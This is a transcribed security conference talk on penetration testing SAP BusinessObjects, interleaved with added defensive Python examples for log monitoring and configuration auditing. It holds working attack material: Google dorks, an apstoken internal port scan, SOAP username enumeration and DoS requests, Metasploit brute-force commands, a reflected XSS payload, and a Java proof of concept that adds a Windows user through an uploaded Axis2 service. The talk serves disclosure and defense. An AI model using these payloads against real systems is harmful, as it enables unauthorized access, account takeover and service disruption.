Hacking SAP BusinessObjects - Spl0it

Transcription

Hacking SAP BusinessObjects
Joshua 'Jabra' Abraham - jabra@rapid7.com
Willis Vandevanter - will@rapid7.com
09/22/10

Overview
- Methodology / Threat Model
- Reconnaissance / Discovery
- Attacking!
- Summary

Standard Disclaimer
Do not do anything contained within this presentation unless you have written permission!!

Who are We?
Joshua "Jabra" Abraham - Security Consultant/Researcher
- Penetration Testing, Web Application Audits and Security Research
- Bachelor of Science in Computer Science
- Contributes to the BackTrack LiveCD, BeEF, Nikto, Fierce, and PBNJ
- Speaker/Trainer at BlackHat, DefCon, ShmooCon, SANS Pentest Summit, OWASP Conferences, LinuxWorld, Infosec World, CSI and Comdex
- Twitter: http://twitter.com/jabra
- Blog: http://spl0it.wordpress.com
Willis Vandevanter - Security Consultant/Researcher
- Penetration Tester and Security Researcher
- BSc in CS, Masters of CS in Secure Software Engineering
- Twitter: http://twitter.com/willis (two underscores!!)

Rapid7 Overview
- Vulnerability Management
- Open source projects
- Professional Services
  - Network Pentesting
  - Web Application Audits
  - Training
  - Deployment

Overview
- What we will discuss
- What we will not discuss
- Things to keep in mind
- Breaking stuff is cool
- Disclaimer

SAP Product Suite
- Enterprise Resource Planning
- Business Intelligence (BI)
- Business Suite
- Customer Relationship Planning
- Product Lifecycle Management
- Supply Chain Management
- Supplier Relationship Management
- R/3
- BusinessObjects
- Netweaver

Focus of this talk
- SAP BusinessObjects Enterprise XI (XI 3.2 is the latest version)
- 20,000 ft view: aggregating and analyzing vast amounts of data, along with presenting it and providing access via many interfaces
- Flexible, Scalable, and Accessible

BO BI Architecture Overview

Interfaces we focused on

Central Management Console
- Administrative interface to BO
- Access is provided via the web server (http://ip:6405/CmcApp); authenticates against the Central Management Server
- Provides:
  - User and group creation and management
  - Server/Services configuration
  - Object rights, scheduling, security settings

Web Services
Provides:
- Session handling: auth, user privilege management
- Business Intelligence Platform: server administration, scheduling, etc.
- Report Engine: access reports (Crystal Reports, Web Intelligence, etc.)
- Query: build ad hoc queries

Service Oriented Architecture 101
- Think Object Oriented over XML
- Add this on top of HTTP
- That's SOA!
- Connect legacy systems
Diagram: Step 1) User Request -> Step 2) Web Service Request -> Step 3) Web Service Response -> Step 4) Web Server Response (back to the User)

SOAP 101
- Web Services: API in XML over HTTP
- OSI Layers 8, 9 and 10
  - Layer 8 - XML
  - Layer 9 - Security (WS-*)
  - Layer 10 - SOAP
- "Wiz Dullz" (WSDLs): data definitions
- UDDIs: pointers

Threat Model
- Web Services in Transit
- Web Services Engine
- Web Services Deployment
- Web Services User Code
Reference: Hacking Web Services

SSL vs Message Security
- Point-to-Point OR chained workflow
- SSL (all or nothing)
  - No fine grained control of portions of the applications
  - No audit trail
- Message security
  - Ton of work!
  - Add amounts of security
  - Audit trail
  - Verify messages have not changed!
  - Encrypt message body (admin attack)
Diagram: a Message passing through Node 1, Node 2, Node 3, Node 4, Node 5

Tools of the Trade
- SOAP QA testing tools: SOAPUI
- Favorite programming language: custom tools
- Proxies
- Our favorite: ethods-ofquick-exploitation-of-blind 25.html

Custom Web Services Client

#!/usr/bin/ruby -w
require 'soap/wsdlDriver'
require 'pp'

# WSDL location; the value was not preserved in the transcription
wsdl = 'http://WSDL_URL'
driver = SOAP::WSDLDriverFactory.new(wsdl).create_rpc_driver
# Log SOAP request and response
driver.wiredump_file_base = "soap-log.txt"
# Use Burp proxy for all requests
driver.httpproxy = 'http://localhost:8080'
# Call the GetQuote operation and pretty-print the response
response = driver.GetQuote(:symbol => 'MSFT')
pp response

SOAPUI

BurpSuite
- Usage with Intruder
- Verify the PRNG - Sequencer
- Etc., etc.

X’s and O’s and Icebergs

Overview
- Methodology / Threat Model
- Reconnaissance / Discovery
- Attacking!
- Summary

Real-World Pentesting
- Evil Attackers - Blackhats
  - Financially motivated
  - Not limited by amount of time and/or resources
- Pen testers - Whitehats
  - Context / goal focused (experience, 6th sense, etc)
  - Demonstrate real world risks, but limited by the time of the engagement
  - A snapshot of the network/application at a point in time

Goal Oriented Pentesting
- Emulate Blackhats by using goals as motivation
- Doesn't replace experience / 6th sense elements
- Pentesting teams focus efforts on critical weaknesses
- Non-technical methodology in which process is the central focus
- Provides the best ROI for organizations when they conduct penetration assessments

Threat Model
- Lots of entry points; we examined a couple
- Different goals for different folks:
  - Unauthorized access to information
  - Remote exploitation of BO server and internal pivot
  - Informational only (version fingerprinting, etc.)

Overview
- Methodology / Threat Model
- Reconnaissance / Discovery
- Attacking!
- Summary

Web Application Overview
- /CmcApp - Administrator interface
- /dswsbobje - Web Services for BusinessObjects (not installed by default; requires deployment of a war)
- /InfoViewApp - Querying interface
- /AnalyticalReporting - Reporting interface

Reconnaissance
- External and internal enumeration
  - Google dorks for identifying externally accessible instances
  - Port and application based enumeration
- Version fingerprinting
  - Browser based
  - Web services based

Google Dorks
- BusinessObjects - InfoViewApp interface: inurl:infoviewapp
- Crystal Reports: filetype:cwr
  - filetype:cwr inurl:apstoken
  - filetype:cwr inurl:viewrpt
  - inurl:apspassword
  - filetype:cwr inurl:init
  - inurl:opendoc inurl:sType

Um, anyone want a port scan internally?
Google: filetype:cwr inurl:apstoken
Internal port scanning (port 80):
http://hostname/CrystalReports/viewrpt.cwr?id=ID&wid=WID&apstoken=internal:80@TOKEN
Port closed response:
Server HOSTNAME:80 not found or server may be down (FWM 01003)
Internal port scanning (port 445):
http://hostname/CrystalReports/viewrpt.cwr?id=ID&wid=WID&apstoken=internal:445@TOKEN
Port open response:
# Unable to open a socket to talk to CMS HOSTNAME:445 (FWM 01005)
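
The apstoken host is what the report viewer connects to, so a defender can check it against the real CMS. The following is an added example, not code from the talk: it screens viewrpt.cwr requests in web-server access logs and flags any whose apstoken steers the viewer somewhere other than the configured CMS. The CMS name, client addresses and log lines are constructed.

```python
# Added example: flag viewrpt.cwr requests whose apstoken targets a host
# other than the real CMS. Hostnames and log lines are constructed.
import re
from urllib.parse import parse_qs, urlsplit

# The CMS the report viewer is supposed to reach (assumed deployment value).
ALLOWED_CMS = {"bocms01.corp.example:6400"}

# Common Log Format line with a GET request.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/1\.[01]" (\d{3})')


def apstoken_target(url):
    """Return the 'host:port' the apstoken tells the viewer to log on to, or None."""
    qs = parse_qs(urlsplit(url).query)
    token = qs.get("apstoken", [None])[0]
    if token is None or "@" not in token:
        return None
    # Token layout seen on the slide: <cms-host>:<port>@<token-body>
    return token.split("@", 1)[0]


def is_suspicious(url, allowed=ALLOWED_CMS):
    """True when a viewrpt.cwr request carries an apstoken aimed away from the CMS."""
    if "viewrpt.cwr" not in urlsplit(url).path.lower():
        return False
    target = apstoken_target(url)
    return target is not None and target not in allowed


def scan_access_log(lines):
    """Yield (client_ip, target) for each suspicious viewrpt.cwr request."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, url = m.group(1), m.group(2)
        if is_suspicious(url):
            yield ip, apstoken_target(url)


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Sep/2010:10:01:02 +0000] "GET /CrystalReports/viewrpt.cwr?id=1&wid=2&apstoken=bocms01.corp.example:6400@TOKEN HTTP/1.1" 200',
    '10.0.0.9 - - [22/Sep/2010:10:01:03 +0000] "GET /CrystalReports/viewrpt.cwr?id=1&wid=2&apstoken=fileserver01:445@TOKEN HTTP/1.1" 500',
    '10.0.0.9 - - [22/Sep/2010:10:01:04 +0000] "GET /CrystalReports/viewrpt.cwr?id=1&wid=2&apstoken=10.0.0.1:80@TOKEN HTTP/1.1" 500',
]

if __name__ == "__main__":
    for ip, target in scan_access_log(SAMPLE_LOG):
        print(f"{ip} steered the report viewer at {target}")
```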

Unique Fingerprinting: 8080/tcp /dswsbobje

Version Detection - Web
Request: /AnalyticalReporting merge web.xml
Response (snip):
<web-app>
  <context-param>
    <param-name>applet.version</param-name>
    <param-value>12.1.0.828</param-value>
  </context-param>
</web-app>

Version Detection - Web Service
Request:
POST p.
<soapenv:Envelope xmlns:soapenv s 1">
  <soapenv:Header/>
  <soapenv:Body>
    <ns:getVersion/>
  </soapenv:Body>
</soapenv:Envelope>
Response:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <getVersionResponse xmlns 1">
      <Version>12.1.0</Version>
    </getVersionResponse>
  </soapenv:Body>
</soapenv:Envelope>

MSFv3 Version Detection Module
msf > use scanner/http/sap_businessobjects_version_enum
sap_businessobjects_version_enum > set RHOSTS 192.168.1.0/24
sap_businessobjects_version_enum > run
- Based on using Dswsbobje (8080/tcp)
- Web Service version request - unauthenticated

Username Enumeration
- Response tells you if the username is valid
- Valid username / invalid password
- SOAP method only

Username Enumeration
POST /dswsbobje/services/session HTTP/1.1
Content-Type: text/xml; charset=UTF-8
SOAPAction: 1/login"
User-Agent: Axis2
Host: x.x.x.x:8080
Content-Length: 631

<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <login xmlns 1">
      <credential xmlns 1" xmlns:ns 1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Login="administrator" Password="PASSWORD1" xsi:type="ns:EnterpriseCredential"/>
      <version xmlns 1">BOE XI 3.0</version>
    </login>
  </soapenv:Body>
</soapenv:Envelope>

MSFv3 User Enumeration Module
msf > use scanner/http/sap_businessobjects_user_enum
sap_businessobjects_user_enum > set RHOSTS 192.168.1.0/24
sap_businessobjects_user_enum > set USERNAME administrator
sap_businessobjects_user_enum > run
- Based on using Dswsbobje (8080/tcp)
- Web Service login request

Overview
- Methodology / Threat Model
- Reconnaissance / Discovery
- Attacking!
- Summary

Unique Identifier (CUID)
- CUIDs are used similarly to session IDs for tasks that are performed
- Ability to request a specific number of CUIDs

Denial of Service Attack
I'd like 100,000 CUIDs please!
POST /dswsbobje/services/biplatform HTTP/1.1
Content-Type: text/xml; charset ects.com/2007/06/01/GenerateCuids

DoS
<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <GenerateCuids xmlns 6/01">
      <SessionID xmlns 6/01">itdirs8l4vkou4%3A6400 %40it-dirs8l4vkou4%3A6400 hkJg2K28oTJ1Nq osca%3Aiiop%3A%2F%2Fitdirs8l4vkou4%3A6400%3BSI SESSIONID%3D2148JfhkJg2K28oTJ1Nq en US America/LosAngeles</SessionID>
      <numCuids xmlns 6/01">100000</numCuids>
    </GenerateCuids>
  </soapenv:Body>
</soapenv:Envelope>
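
Since the only attacker-controlled knob here is numCuids, a proxy or WAF in front of the biplatform service can refuse oversized requests before they reach the CMS. The following is an added example, not code from the talk or the product: the cap, the placeholder namespace URI and the sample request body are assumptions made for the example.

```python
# Added example: pre-screen GenerateCuids requests and reject absurd
# numCuids values. Cap and namespace URI are assumptions, not SAP defaults.
import xml.etree.ElementTree as ET

MAX_CUIDS_PER_REQUEST = 100  # policy value chosen for this example


def local_name(tag):
    """Strip the '{namespace}' prefix ElementTree puts on qualified tag names."""
    return tag.rsplit("}", 1)[-1]


def requested_cuids(soap_body):
    """Return the numCuids value of a GenerateCuids request, or None when the
    body is not such a request. Raises ET.ParseError on malformed XML and
    ValueError when numCuids is not an integer."""
    root = ET.fromstring(soap_body)
    for elem in root.iter():
        if local_name(elem.tag) != "GenerateCuids":
            continue
        for child in elem.iter():
            if local_name(child.tag) == "numCuids":
                return int((child.text or "").strip())
    return None


def screen_request(soap_body, cap=MAX_CUIDS_PER_REQUEST):
    """Return (allow, reason); bodies that are not GenerateCuids pass through."""
    try:
        n = requested_cuids(soap_body)
    except (ET.ParseError, ValueError):
        return (False, "malformed SOAP body or numCuids")
    if n is None:
        return (True, "not a GenerateCuids request")
    if n <= 0:
        return (False, "numCuids must be positive")
    if n > cap:
        return (False, f"numCuids {n} exceeds cap {cap}")
    return (True, f"numCuids {n} within cap")


# Constructed request mirroring the slide, with a placeholder namespace.
SAMPLE_DOS = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <GenerateCuids xmlns="urn:example:biplatform">
      <SessionID xmlns="urn:example:biplatform">SESSION-PLACEHOLDER</SessionID>
      <numCuids xmlns="urn:example:biplatform">100000</numCuids>
    </GenerateCuids>
  </soapenv:Body>
</soapenv:Envelope>"""
```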

Oracle SQL Injection Error Codes
Catch interesting errors:
- ORA-00921: unexpected end of SQL command
- ORA-00936: missing expression
- ORA-00933: SQL command not properly ended
- ORA-00970, ORA-00907, ORA-01756, ORA-00923, ORA-00900, PLS-00103, LPX-00601, ORA-00604
Crashes - for C code:
- ORA-03113 - might also be an instance crash
- ORA-03114, ORA-01012
- ORA-00600 - Internal
/2008/12/UKOUG122008-slavik.pdf

MSFv3 User Bruteforce Module
msf > use scanner/http/sap_businessobjects_user_brute
sap_businessobjects_user_brute > set RHOSTS 192.168.1.0/24
sap_businessobjects_user_brute > set USERNAME administrator
sap_businessobjects_user_brute > set PASSWORD password
sap_businessobjects_user_brute > run
- Based on using Dswsbobje (8080/tcp)
- Web Service login request

MSFv3 User Bruteforce Module (Web)
msf > use scanner/http/sap_businessobjects_user_web
sap_businessobjects_user_web > set RHOSTS 192.168.1.0/24
sap_businessobjects_user_web > set USERNAME administrator
sap_businessobjects_user_web > set PASSWORD password
sap_businessobjects_user_web > run
- Based on using CmcApp (6405/tcp)
- Web Application login request
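
Both the enumeration and the brute-force modules above drive the same Dswsbobje session service, so a burst of POSTs to it from one client is the signal to watch for. The following is an added example, not code from the talk or from Metasploit: a sliding-window counter over Tomcat access-log lines. The window, threshold, client addresses and log lines are constructed assumptions.

```python
# Added example: flag clients hammering /dswsbobje/services/session.
# Thresholds and the sample log are constructed for illustration.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

SESSION_ENDPOINT = "/dswsbobje/services/session"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "POST (\S+) HTTP/1\.[01]" \d{3}')


def parse_line(line):
    """Return (ip, timestamp, path) for a POST line in Common Log Format, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
    return m.group(1), ts, m.group(3)


def login_bursts(lines, window_seconds=60, threshold=20):
    """Return {ip: time_first_flagged} for clients that reach `threshold` POSTs
    to the session endpoint inside any sliding window of `window_seconds`."""
    recent = defaultdict(deque)
    flagged = {}
    window = timedelta(seconds=window_seconds)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[2] != SESSION_ENDPOINT:
            continue
        ip, ts, _ = parsed
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop entries older than the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def make_sample_log():
    """Constructed Tomcat access log: one noisy client, one normal client."""
    base = datetime(2010, 9, 22, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "POST {path} HTTP/1.1" 200'
    lines = []
    for i in range(25):   # 25 login POSTs in 50 seconds from 10.0.0.9
        ts = (base + timedelta(seconds=2 * i)).strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(fmt.format(ip="10.0.0.9", ts=ts, path=SESSION_ENDPOINT))
    for i in range(5):    # 5 login POSTs spread over 40 minutes from 10.0.0.5
        ts = (base + timedelta(minutes=10 * i)).strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(fmt.format(ip="10.0.0.5", ts=ts, path=SESSION_ENDPOINT))
    return lines
```

The default Tomcat access log does not record the SOAPAction header, so this counts every POST to the session service; add the header to the log pattern if you want to count only login calls.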

Reflective Cross-Site Scripting
Request:
GET /dswsbobje/axis2admin/engagingglobally?modules="%3e%20%3cXSS%3e&submit=Engage HTTP/1.1
Host: x.x.x.x:8080
.snip.
Response:
.snip.
<p><font color="blue">The system is attempting to engage a module that is not available: "><XSS></font></p><!-
.snip.

Persistent Cross Site Scripting

Remote Code Execution
- Cross-Site Scripting is great, but we want a shell!!
- CmcApp services for upload and exec:
  - InputFileRepository
  - ProgramJobServer - not enabled by default
- To execute an exe, administrator credentials are required

CmcApp RCE
You can set program object specific logon details by editing the "Program Logon" property of an object. These authentication details are not required if the credentials have been globally set (Applications > CMC > Program Object Rights > "Schedule with the following Operating System Credentials").
Reference: CMC Help Index > program objects > Java programs > Authentication and program objects

CmcApp Steps for RCE
1. Log on to the server computer.
2. Go to Control Panel > Administrative Tools > Local Security Policy.
3. Under Security Settings click Local Policies and then click User Rights Assignment.
4. Add the domain user account to the following policies:
   a. Replace Process Level Token policy.
   b. Log on as a batch job.
   c. Adjust memory quotas for a process.
   d. Access this computer from the network (usually Everyone by default).
5. Go to the CCM and stop the Program Job Server.
6. Right-click Program Job Server and then click Properties.
7. Type the domain user account and password into the Log On As text box.
8. Now you can schedule a metric refresh.

Dswsbobje
- Provides Web Services for BusinessObjects
- Not installed by default
- Requires:
  - Deployment of a war
  - Tomcat interface
- Remember the Tomcat Manager vulnerability (tomcat/tomcat): Remote Code Execution
- Opens up a new n/login

Dswsbobje (think: dsw-s-bobje)
- Ability to administer web services
  - Modify web services
  - Delete web services (already deployed)
  - Add web services (hmm, that sounds handy!)
- Guess what... it is!

Remote Code Execution PoC

package org.apache.axis2.axis2userguide;

import java.io.IOException;

public class AddUser {
    public AddUser() {}

    // Deployed as an Axis2 service operation, so calling it runs the command on the server
    public void main() {
        Process process;
        try {
            process = Runtime.getRuntime().exec("net user foo bar /add");
        } catch (IOException ioexception) {
            ioexception.printStackTrace();
        }
        return;
    }
}

DEMO!
http://spl0it.org/files/talks/source_barcelona10/demo/RCE_SAP_BusinessObjects_Dswsbobje.html

RCE Attack / Recommendations
Attack requires the following:
- Dswsbobje is deployed (it is deployed if you are using SOA!)
- Default administrator credentials are still in place
- Restart of the Tomcat service after uploading the malicious web service
Change default credentials:
C:\Program Files\Apache Software f\axis2.xml
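
The credential check is easy to automate across an estate. The following is an added example, not code from the talk or from Axis2: it reads an axis2.xml and reports whether the Axis2 admin console still uses the stock admin / axis2 pair (the default Axis2 ships with; Dswsbobje bundles Axis2). The file contents and the 12-character length rule are assumptions for the example.

```python
# Added example: audit an Axis2 axis2.xml for default admin credentials.
# Axis2 keeps them as <parameter name="userName"> / <parameter name="password">
# under <axisconfig>. File contents and the length rule are assumptions.
import xml.etree.ElementTree as ET

# Stock Axis2 admin login (admin / axis2), taken as the baseline to flag.
DEFAULT_ADMIN = ("admin", "axis2")
MIN_PASSWORD_LEN = 12  # policy value chosen for this example


def admin_credentials(axis2_xml):
    """Return (userName, password) from an axis2.xml string, or None if either is missing."""
    root = ET.fromstring(axis2_xml)
    params = {p.get("name"): (p.text or "").strip() for p in root.iter("parameter")}
    if "userName" not in params or "password" not in params:
        return None
    return params["userName"], params["password"]


def audit_axis2(axis2_xml):
    """Return a list of findings; an empty list means nothing to report."""
    creds = admin_credentials(axis2_xml)
    if creds is None:
        return ["admin userName/password parameters not found"]
    user, pwd = creds
    findings = []
    if (user, pwd) == DEFAULT_ADMIN:
        findings.append("default Axis2 admin credentials still in place")
    elif pwd == DEFAULT_ADMIN[1]:
        findings.append("default Axis2 admin password still in place")
    if len(pwd) < MIN_PASSWORD_LEN:
        findings.append(f"admin password shorter than {MIN_PASSWORD_LEN} characters")
    return findings


# Constructed axis2.xml fragment as shipped (weak) and after changing the login.
WEAK_CONFIG = """<axisconfig name="AxisJava2.0">
  <parameter name="hotdeployment">true</parameter>
  <parameter name="userName">admin</parameter>
  <parameter name="password">axis2</parameter>
</axisconfig>"""

HARDENED_CONFIG = WEAK_CONFIG.replace(">admin<", ">bo-ws-admin<").replace(
    ">axis2<", ">REPLACE-WITH-LONG-RANDOM-SECRET<")
```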

Summary / QA
- Technical methodology for pentesting SAP BusinessObjects
- Understanding SOAP / SOA is a large portion of hacking SAP BusinessObjects
- Security Advisory to be released October 12th (www.rapid7.com)
- Metasploit modules to be released October 12th (www.metasploit.com)

Comments/Questions?
Joshua "Jabra" Abraham
- Jabra aT spl0it d0t org
- Jabra aT rapid7 d0t com
- Company: http://www.rapid7.com
- Blog: http://spl0it.wordpress.com
- Twitter: http://twitter.com/jabra
Willis Vandevanter
- Will aT rapid7 d0t com
- Twitter: http://twitter.com/willis (two underscores!)
- Company: http://www.rapid7.com
